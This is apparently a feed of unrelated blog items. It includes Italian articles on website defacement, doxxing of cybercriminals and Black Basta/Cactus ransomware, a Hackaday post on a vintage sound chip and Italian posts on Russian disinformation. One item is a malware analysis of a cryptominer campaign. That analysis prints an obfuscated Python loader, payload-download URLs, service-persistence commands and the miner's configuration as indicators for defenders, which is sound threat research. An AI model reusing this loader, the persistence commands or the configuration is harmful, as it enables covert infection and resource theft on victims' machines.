In particolare, Anonymous Italia, un gruppo che in passato ha effettuato numerosi defacement contro siti russi diffondendo il loro supporto verso i valori occidentali e verso l’ucraina. Il defacement, in questo contesto, si è rivelato uno strumento di guerra psicologia, capace di manipolare la percezione pubblica e l’opinione internazionale. Sebbene

Dalla protesta alla cyber war: quando il deface diventa strategico

Se in passato i defacement erano prevalentemente azioni simboliche, oggi sempre più spesso si inseriscono in strategie di guerra cibernetica. Stati e gruppi di cyber mercenari (o milizia cyber) utilizzano il deface non solo per propaganda, ma anche per diffondere disinformazione e destabilizzare i nemici.

Un caso esemplare è quello dei gruppi filo-russi e filo-ucraini che, dal 2022, si sono impegnati in campagne di defacement contro siti governativi, banche e media. L’obiettivo non è solo mostrare superiorità tecnica, ma anche minare la fiducia nelle istituzioni colpite e diffondere narrazioni favorevoli alla propria parte.

Questa transizione dall’hacktivismo verso la psyops e cyber war mostra come il cyberspazio sia diventato un nuovo campo di battaglia, dove l’informazione è un’arma tanto potente quanto i malware più sofisticati.
#OpSaveGaza; l’operazione di Luglio del 2014 di Anonymous_Arabe in relazione alle tensioni sulla striscia di Gaza

Tecniche e strumenti utilizzati nei defacement

Il defacement può avvenire attraverso diverse tecniche, a seconda delle vulnerabilità sfruttate dagli attaccanti. Tra i metodi più comuni troviamo:

• SQL Injection: permette di ottenere accesso ai database di un sito web e modificarne i contenuti.
• Exploiting di CMS vulnerabili: molte piattaforme, come WordPress e Joomla, sono prese di mira se non aggiornate.
• Credential stuffing: utilizzando credenziali rubate, gli hacker possono accedere ai sistemi di gestione del sito.
• Remote Code Execution: sfruttamento di bug di sicurezza e CVE note/0day per effettuare un accesso malevolo al sistema ed effettuare modifiche strutturali delle pagine

Per contrastare questi attacchi, le organizzazioni devono implementare buone pratiche di sicurezza, come aggiornamenti costanti, protezioni WAF (Web Application Firewall) e monitoraggio attivo delle minacce.

Il futuro dei deface: tra nuove minacce e misure di difesa

In un contesto di guerra ibrida, dove le operazioni cibernetiche si combinano con azioni di guerra tradizionale, il deface potrebbe diventare sempre più uno strumento di guerra psicologica (psyops). Un esempio è la possibilità di alterare siti di news per diffondere fake news credibili e manipolare l’opinione pubblica.

Le operazioni di guerra psicologica nel cyberspazio non si limitano al defacing, ma includono una gamma di tattiche come la manipolazione dei social media, la diffusione di propaganda attraverso botnet e la creazione di deepfake per screditare figure pubbliche o influenzare eventi geopolitici.

L’hacktivismo, spesso considerato un fenomeno separato dalla cyber war, può invece sovrapporsi alle psyops quando gruppi come Anonymous o altri collettivi che sfruttano gli attacchi DDoS, leak di documenti e sabotaggi digitali per influenzare la percezione pubblica e la narrativa politica. In scenari di conflitto, stati-nazione potrebbero anche sfruttare gruppi hacktivisti come proxy per condurre operazioni di disinformazione senza esporsi direttamente.

Un esempio storico è l’uso delle cyber psyops nel conflitto Russia-Ucraina, dove attori statali e non statali hanno alterato siti web, diffuso false notizie e sfruttato social media per destabilizzare il nemico. Questo dimostra come la guerra dell’informazione e le operazioni di influenza possano avere un impatto strategico, influenzando non solo l’opinione pubblica, ma anche le decisioni militari e politiche.

Deface utilizzato anche dalle forze dell’ordine

Le forze dell’ordine hanno iniziato a utilizzare il defacing come una strategia per dimostrare la compromissione delle infrastrutture informatiche di gruppi criminali, mostrando così la loro capacità di infiltrarsi nelle reti di attori malevoli. Un esempio significativo di questo approccio è l’operazione Cronos, un’azione internazionale contro il gruppo ransomware LockBit. Durante questa operazione, le autorità hanno preso il controllo dei sistemi utilizzati da LockBit per pubblicare i dati delle aziende violate e hanno effettuato il deface di alcuni dei loro siti web. Inoltre hanno utilizzato la tecnica del countdown (tipico delle cybergang ransomware) per mostrare informazioni inedite relativamente a LockBit e ai suoi affiliati.
Data Leak Site di Lockbit “deturpato” dalle forze dell’ordine nell’operazione cronos. (fonte RedHotCyber)
Un altro esempio notevole è stato l’intervento delle forze dell’ordine contro il noto marketplace del dark web Genesis Market, un sito utilizzato per la vendita di credenziali rubate e dati personali. Dopo aver smantellato il mercato, le autorità hanno sostituito il sito web con una pagina che notificava l’arresto e la rimozione della piattaforma.

Questa operazione non solo ha interrotto l’attività illegale nel clear web, ma ha anche servito a mostrare in modo visibile l’efficacia delle indagini e delle operazioni cyber nel disarticolare le reti criminali. Il defacing, in questo caso, è stato uno strumento di dimostrazione pubblica del successo delle forze dell’ordine nella lotta contro il crimine informatico.
Deface di Genesis Market alla quale chiusura ha partecipato anche la nostra Polizia Postale (Fonte RedHotCyber)
L’uso di tali tattiche da parte delle forze dell’ordine evidenzia il crescente impiego di operazioni di hacking legittimo per contrastare e smantellare le infrastrutture criminali, un approccio che potrebbe diventare sempre più comune nelle operazioni contro il crimine cibernetico.

Conclusione

Il defacement, nato come una semplice forma di protesta digitale, si è trasformato in uno strumento sofisticato per condurre psyops e guerra cibernetica e manipolazione delle informazioni. Mentre gli hacktivisti veri continuano a utilizzarlo per denunciare ingiustizie, gli attori statali – sotto doppia maschera – ingaggiano gruppi di cyber criminali mercenari integrando tali operazioni in strategie di cyber war.

Comprendere le dinamiche dietro questi attacchi è essenziale per difendersi e per anticipare le mosse di chi sfrutta il cyberspazio per fini politici e strategici.

La battaglia per la sicurezza digitale è appena iniziata, e il ruolo del defacement e del DDoS sta cambiando, e questo scenario continuerà a evolversi.

L'articolo Alla Scoperta dei Deface: tra Hacktivismo Cibernetico, Psy-Ops e Cyber Warfare proviene da il blog della sicurezza informatica.

dicorinto.it/associazionismo/s…

In recent months, we’ve seen an increase in the use of Windows Packet Divert drivers to intercept and modify network traffic in Windows systems. This technology is used in various utilities, including ones for bypassing blocks and restrictions of access to resources worldwide. Over the past six months, our systems have logged more than 2.4 million detections of such drivers on user devices.

Dynamics of Windows Packet Divert detections (download)

The growing popularity of tools using Windows Packet Divert has attracted cybercriminals. They started distributing malware under the guise of restriction bypass programs and injecting malicious code into existing programs.

Such software is often distributed in the form of archives with text installation instructions, in which the developers recommend disabling security solutions, citing false positives. This plays into the hands of attackers by allowing them to persist in an unprotected system without the risk of detection. Most active of all have been schemes for distributing popular stealers, remote access tools (RATs), Trojans that provide hidden remote access, and miners that harness computing power to mine cryptocurrency. The most commonly used malware families were NJRat, XWorm, Phemedrone and DCRat.

Blackmail as a new infection scheme

We recently uncovered a mass malware campaign infecting users with a miner disguised as a tool for bypassing blocks based on deep packet inspection (DPI). The original version of the tool is published on GitHub, where it has been starred more than 10,000 times. There is also a separate project based on it that is used to access Discord and YouTube.

According to our telemetry, the malware campaign has affected more than 2,000 victims in Russia, but the overall figure could be much higher. One of the infection channels was a YouTuber with 60,000 subscribers, who posted several videos with instructions for bypassing blocks, adding a link to a malicious archive in the description. These videos have reached more than 400,000 views. The description was later edited and the link replaced with the message “program does not work”.

The link pointed to the malicious site
gitrok[.]com, which hosted the infected archive. The counter at the time of posting the video showed more than 40,000 downloads.

Later, in discussions in the tool’s original repository, we found messages about a new distribution scheme: attackers under the guise of the tool developers sent strikes about the videos with instructions for bypassing restrictions. Next, the attackers threatened the content creators under the pretext of copyright infringement, demanding that they post videos with malicious links or risk shutdown of their YouTube channels.

Translation:
Hi, I have a question about YouTube strikes on the use of open-source code from the repository [REDACTED].
I created a tutorial video using materials from this repository, since it was publicly available on GitHub, and the video was non-commercial. But I still got hit with a YouTube strike for demonstrating the code.
I’d like to know if it’s the authors themselves or someone on their behalf who send the strikes? Or is it just a misunderstanding?

This way, the scammers were able to manipulate the reputation of popular YouTubers to force them to post links to infected files.

Example of a fraudulent message asking a YouTuber to post a link to a malicious site

Translation:
Official website: gitrok.com
All traffic should be now directed strictly to this site. GitHub remains solely a repository for developers.
If you have social networks where you’ve advertised [REDACTED], please publish a new post with a mention of our official website, and note that you can now download [REDACTED] only from there.

YouTuber complaints about cybercriminal activity

Translation:
Dear program developer @[REDACTED] YouTubers who showed how the program works and helped people unblock YouTube in Russia are having problems with scammers handing out strikes and threatening to delete these creators’ channels. They force you to shoot 2 more videos for your channel so that if anything happens they can send 2 more strikes, then it’s 3 strikes and you’re out – Google will delete the channel. YouTubers feel pressured to give in to the scammers’ demands to save their channels. But that only makes things worse.

SCAMMERS FORCE YOUTUBERS TO SHOOT VIDEOS OF THEIR PROGRAM, THAT’S WHY I DON’T HAVE A SINGLE YOUTUBE VIDEO OF THIS PROGRAM…

In addition, we found a Telegram channel actively distributing the malicious build and a video tutorial on a YouTube channel with 340,000 subscribers.

And in December 2024, users reported the distribution of a miner-infected version of the same tool through other Telegram and YouTube channels, which have since been shut down.

Infected archive

All the discovered infected archives contained one additional executable file, while the original start script
general.bat had been modified to run this file using PowerShell. In one version, if the security solution on the victim’s device deleted the malicious file, the modified start script displayed the message “File not found, disable all antiviruses and re-download the file, that will help!” to persuade the victim to run the malicious file, bypassing protection:

Contents of the original (left) and modified (right) general.bat start script

The malicious executable is a simple loader written in Python and packed into an executable application using PyInstaller. In some cases, the script has been additionally obfuscated using the PyArmor library.
import os
import subprocess
import sys
import ctypes
import base64
import tempfile
import urllib.request as urllib
import datetime
import time
import psutil
import base64
import binascii
cmb8F2SLqf1 = '595663786432497a536a424...335331453950513d3d'
decoded_hex = bytes.fromhex(cmb8F2SLqf1).decode()
step1 = base64.b64decode(decoded_hex).decode()
exec(base64.b64decode(step1).decode())

Example of the unpacked loader

The loader retrieves the URL of the next-stage payload from a hardcoded path on one of two domains:
canvas[.]pet or swapme[.]fun. After the download, it saves the payload named t.py in a temporary directory and runs it.
Note that the payload can be downloaded only from Russian IP addresses, indicating that the malware campaign was aimed at users in Russia.

Second-stage malware loader

The next stage of the infection chain was a custom Python loader based on open-source code snippets. Below are the execution steps for this script:

1. Scanning the current environment for artifacts of running on a virtual machine or in a sandbox. The loader compares system data (computer and user names, MAC addresses, unique disk identifiers (HWID), GPU parameters, etc.) with predefined lists of values used by virtual environments.
2. Adding the AppData directory to Microsoft Defender exclusions.
3. GET request to 193.233.203[.]138/WjEjoHCj/t. Depending on the response (true/false) and the specified probability, the script either downloads the executable file from the server at http://9x9o[.]com/q.txt, or uses a hardcoded block of data in Base64 format. The resulting file is saved at %LocalAppData%\driverpatch9t1ohxw8\di.exe.
4. Modifying the payload. The executable file just written to disk is modified by appending random blocks of data to the end until it reaches 690 MB in size. This technique is used to hinder automatic analysis by antivirus solutions and sandboxes.
5. Gaining persistence in the system. The loader creates a service named DrvSvc and sets its description to that of the legitimate Windows Image Acquisition (WIA) service:
   svc_name = "DrvSvc"
   svc_desc = "Launches applications associated with still image acquisition events."
   cmd_create = f'sc create {svc_name} binPath= "{exe_path}" start= auto'
   cmd_desc = f'sc description {svc_name} "{svc_desc}"'

SilentCryptoMiner

The downloaded
di.exe is a SilentCryptoMiner sample based on the open-source miner XMRig. This is a covert miner able to mine multiple cryptocurrencies (ETH, ETC, XMR, RTM and others) using various algorithms. For stealth, SilentCryptoMiner employs process hollowing to inject the miner code into a system process (in this case, dwm.exe). The malware is able to stop mining while the processes specified in the configuration are active. It can be controlled remotely via a web panel. The miner is coded to scan for indicators of running in a virtual environment and check the size of the executable itself, which must be at least 680 MB and no more than 800 MB – this is how the attackers make sure that the miner was run by the above-described loader.
The miner configuration is Base64-encoded and encrypted using the AES-CBC algorithm with the key
UXUUXUUXUUCommandULineUUXUUXUUXU and the initialization vector UUCommandULineUU. It has many parameters, including: the algorithm and URL for mining; a list of programs which upon execution cause the miner to temporarily stop and free its resources; a link to the remote configuration that the miner will receive every 100 minutes.--algo=rx/0 --url=150.241.93[.]90:443 --user="JAN2024" --pass="JAN2024" --cpu-
max-threads-hint=20 --cinit-remote-config="https://pastebin.com/raw/kDDLXFac" --
cinit-stealth-
targets="Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe" --
cinit-version="3.2.0" --tls --cinit-idle-wait=4 --cinit-idle-cpu=30 --cinit-
id="uvduaauhlrqdhmpj"
The campaign makes use of the Pastebin service to store configuration files. We detected several accounts distributing such files.

Takeaways

The topic of restriction bypass tools is being actively exploited to distribute malware. The above campaign limited itself to distributing a miner, but threat actors could start to use this vector for more complex attacks, including data theft and downloading other malware. This underscores once again that, while such tools may look enticing, they pose a serious threat to user data security.

Indicators of compromise

Infected archives

574ed9859fcdcc060e912cb2a8d1142c
91b7cfd1f9f08c24e17d730233b80d5f

PyInstaller loaders

9808b8430667f896bcc0cb132057a683
0c380d648c0c4b65ff66269e331a0f00

Malicious Python scripts

1f52ec40d3120014bb9c6858e3ba907f
a14794984c8f8ab03b21890ecd7b89cb

SilentCryptoMiner

a2a9eeb3113a3e6958836e8226a8f78f
5c5c617b53f388176173768ae19952e8
ac5cb1c0be04e68c7aee9a4348b37195

Malicious domains and IPs

hxxp://gitrok[.]com
hxxp://swapme[.]fun
hxxp://canvas[.]pet
hxxp://9x9o[.]com
193.233.203[.]138
150.241.93[.]90

securelist.com/silentcryptomin…

Nel Dark Web, l’anonimato è la valuta più preziosa. È ciò che distingue i predatori dalle prede, che consente ai cyber criminali di operare senza paura di conseguenze, che alimenta la convinzione di essere intoccabili. Ma cosa succede quando qualcosa si spezza? Quando coloro che costruiscono il proprio potere sulla paura di essere esposti diventano, a loro volta, vittime dello stesso meccanismo?

Negli ultimi anni, alcuni dei più noti protagonisti del cybercrime hanno vissuto sulla propria pelle il paradosso del doxxing: credendo di poter agire impunemente, sono stati smascherati e costretti alla fuga, a volte dalla legge, altre volte dagli stessi ambienti che un tempo li osannavano. Perché nel Dark Web, l’anonimato è solo un’illusione.

Nel mondo del doxxing, nessuna piattaforma era più temuta di Doxbin, un forum del Dark Web dove venivano pubblicate informazioni personali di individui presi di mira dalla community: giornalisti, forze dell’ordine, rivali. A gestirlo c’era KT, un personaggio enigmatico che, per anni, ha cavalcato la paura e il caos che il sito generava.

Ma nel 2022, l’equilibrio si è spezzato. Dopo aver venduto Doxbin, KT ha scoperto che il passato non si cancella facilmente nel Dark Web. In breve tempo, il nuovo amministratore ha divulgato la sua identità, esponendolo a ritorsioni, minacce e alla stessa identica dinamica che lui stesso aveva alimentato.

Nel Dark Web, il potere è effimero. Basta un solo errore, un singolo tradimento, e ciò che sembrava una fortezza diventa una prigione senza vie di fuga.

RaidForums e la Fine di Omnipotent: Il Dark Web Non Perdona

Se Doxbin rappresentava il lato più brutale del doxxing, RaidForums rappresenta il regno della compravendita di dati rubati. Qui vengono scambiati credenziali, numeri di carte di credito, informazioni sottratte a enti governativi e aziende di tutto il mondo. A regnare su questo impero c’era Omnipotent, un nome che trasmetteva onnipotenza e intoccabilità.

Eppure, nel 2022, un’operazione internazionale ha messo fine a questa illusione. Come è stato smascherato? È stata un’infiltrazione delle forze dell’ordine? Una fuga di dati interna? O forse, semplicemente, l’arroganza di sentirsi al sicuro?

Ciò che è certo è che Omnipotent è caduto. Il suo anonimato, su cui aveva costruito tutto, si è rivelato fragile. E quando l’anonimato svanisce, l’unica cosa che resta è la paura di essere trovato.

Ma il doxxing non arriva solo dall’esterno. A volte, il pericolo è dentro le stesse organizzazioni.

Il Tradimento che ha Distrutto Conti: Quando il Cybercrime si Sbriciola dall’Interno

Il gruppo ransomware Conti ha terrorizzato aziende e governi, accumulando milioni di dollari in riscatti. La loro rete era complessa, ben strutturata, apparentemente inespugnabile. Tuttavia, nel 2022, un evento inaspettato ha mandato tutto in frantumi: un insider ha deciso di pubblicare l’intero archivio delle loro conversazioni interne, rivelando strategie, affiliazioni e identità dei membri.

Non è stata la polizia, né un’operazione di intelligence. È stato un tradimento interno, il prodotto di tensioni, dissapori o forse della consapevolezza che il sistema era destinato a crollare.

Questa fuga di informazioni ha segnato la fine di Conti. Molti affiliati si sono dati alla fuga, alcuni sono stati arrestati, altri hanno tentato di reinventarsi sotto nuove identità. Ma la lezione era chiara: nel cybercrime, il nemico più letale può essere quello che siede accanto a te.

Nel Dark Web, la fiducia è un’arma a doppio taglio. Oggi sei un alleato, domani potresti essere il prossimo bersaglio.

Il doxxing è una lama senza manico. Chi lo impugna deve essere pronto a tagliarsi.

L'articolo Doxxing nel Dark Web: La Vendetta che Nessuno Può Evitare proviene da il blog della sicurezza informatica.

I team Managed XDR e Incident Response di Trend Micro hanno recentemente scoperto campagne coordinate dai gruppi ransomware Black Basta e Cactus che utilizzano una variante condivisa del malware BackConnect (rilevata come QBACKCONNECT) per stabilire un accesso persistente.

Combinazione di Ingegneria sociale e malware

Questi attacchi dimostrano una combinazione potenzialmente dannosa diingegneria sociale, abuso di strumenti legittimi e sfruttamento dell’infrastruttura cloud. La catena di attacco inizia con un’ondata di e-mail che inonda le caselle di posta delle vittime, seguita da tentativi di furto d’identità tramite Microsoft Teams.

Gli aggressori utilizzano innanzitutto tecniche di ingegneria sociale per ottenere l’accesso iniziale, ingannando le vittime e inducendole a fornire credenziali. Microsoft Teams viene sfruttato per l’impersonificazione, mentre Quick Assist e software di accesso remoto simili aiutano gli aggressori ad aumentare i privilegi.

OneDriveStandaloneUpdater.exe, uno strumento di aggiornamento Microsoft OneDrive viene utilizzato per caricare lateralmente DLL dannose, fornendo agli aggressori l’accesso alla rete.

Gli aggressori quindi distribuiscono il malware BackConnect, che consente loro di mantenere il controllo sui sistemi infetti. I file dannosi vengono ospitati e distribuiti tramite servizi di archiviazione cloud commerciali, sfruttando bucket di archiviazione non configurati correttamente o accessibili al pubblico.

I ricercatori hanno collegato il malware BackConnect a QakBot, un loader che è stato oggetto dell’operazione di smantellamento del 2023 nota come “Operazione Duckhunt”. QakBot ha svolto un ruolo cruciale nel garantire agli autori del ransomware Black Basta l’accesso ai sistemi target. Dopo la sua rimozione, questi autori della minaccia sono passati a metodi alternativi per mantenere le loro operazioni.

Malware di Sideloading e BackConnect di OneDrive

Gli aggressori sfruttano OneDriveStandaloneUpdater.exe, un file binario Microsoft legittimo, per caricare lateralmente una DLL dannosa (winhttp.dll). Questa DLL decifra i payload da settingsbackup.dat, distribuendo il malware BackConnect. Il comando e controllo persistente (C2) viene stabilito tramite IP come 38.180.25[.]3, registrati nella chiave di registro. Trend Micro attribuisce questi IP all’infrastruttura C2 di Black Basta.

BackConnect consente l’esecuzione di codice remoto, il furto di credenziali e lo spostamento laterale tramite Server Message Block (SMB) e Windows Remote Management (WinRM). Il gruppo Cactus, ora composto da ex operatori di Black Basta, impiega TTP pressoché identici. Dopo aver distribuito BackConnect, intensificano gli attacchi prendendo di mira gli hypervisor VMware ESXi. Il malware socks.out (una variante di SystemBC) disabilita la sicurezza ESXi.

L'articolo Black Basta e Cactus utilizzano Teams e OneDrive per le loro operazioni. I dettagli degli attacchi proviene da il blog della sicurezza informatica.

Talking computers are nothing these days. But in the old days, a computer that could speak was quite the novelty. Many computers from the 1970s and 1980s used an AY-3-8910 chip and [InazumaDenki] has been playing with one of these venerable chips. You can see (and hear) the results in the video below.

The chip uses PCM, and there are different ways to store and play sounds. The video shows how different they are and even looks at the output on the oscilloscope. The chip has three voices and was produced by General Instruments, the company that initially made PIC microcontrollers. It found its way into many classic arcade games, home computers, and games like Intellivision, Vectrex, the MSX, and ZX Spectrum. Soundcards for the TRS-80 Color Computer and the Apple II used these chips. The Atari ST used a variant from Yamaha, the YM2149F.

There’s some code for an ATmega, and the video says it is part one, so we expect to see more videos on this chip soon.

General instruments had other speech chips and some of them are still around in emulated form. In fact, you can emulate the AY-3-8910 with little more than a Raspberry Pi Pico.

youtube.com/embed/EJkdTjGpREg?…

hackaday.com/2025/03/05/speaki…

Buongiorno a tutti!

Voglio suggerirvi un libro che a mio avviso è importantissimo, e lo dico anche da persona che lavora nell'informatica da trent'anni e usa computer da 44, da quando internet ancora non era diffuso.

Ci troviamo di fronte a quello che a mio avviso è un capolavoro per fare capire come il Cremlino manovri l'informazione - e soprattutto la cattiva informazione - con lo scopo di destabilizzare l'Europa.

Ora i più pruriginosi di voi mi diranno che anche gli Stati Uniti lo fanno, ma è proprio leggendo il testo che si comprende come il modo sia del tutto diverso: nel caso della Russia, l'obiettivo non è creare simpatia nei loro confronti (cosa difficile, del resto, per qualsiasi umano con 2 neuroni in fila), ma creare disordine.
Nel disordine, nel caos che non ti fa più capire cosa è vero e cosa è falso, è facilissimo cedere a sovranismi, secessioni, porcate varie.

E il loro scopo è già stato raggiunto.

A questo si sommano ovviamente gli attacchi informatici...ma è tutto nel libro.

Buona lettura e, se lo leggerete, fatemi sapere cosa ne pensate.

ledizioni.it/prodotto/brigate-…

BRIGATE RUSSE -

Ledizioni - Innovative Publishing. Casa editrice universitaria. Open Access. eBook, ePub. Creative Commons.

^Ledizioni

Mi chiedo cosa ci sia di difficile da capire.

Eppure, a quanto pare c'è ancora chi è convinto che la pace si ottenga con la resa.

Il che, almeno temporaneamente, sarebbe anche vero ma senza dimenticare che pace non è uguale a giustizia.

Forse questo articolo può fare comprendere un concetto tanto semplice quanto ignorato.

esquire.com/it/news/attualita/…

Come sarebbe l'Italia se perdesse il 20% del suo territorio, tipo l'Ucraina

Perderebbe Piemonte, Liguria e Lombardia. Da San Remo fino a Ferrara.

^{Enrico Pitzianti (Esquire)}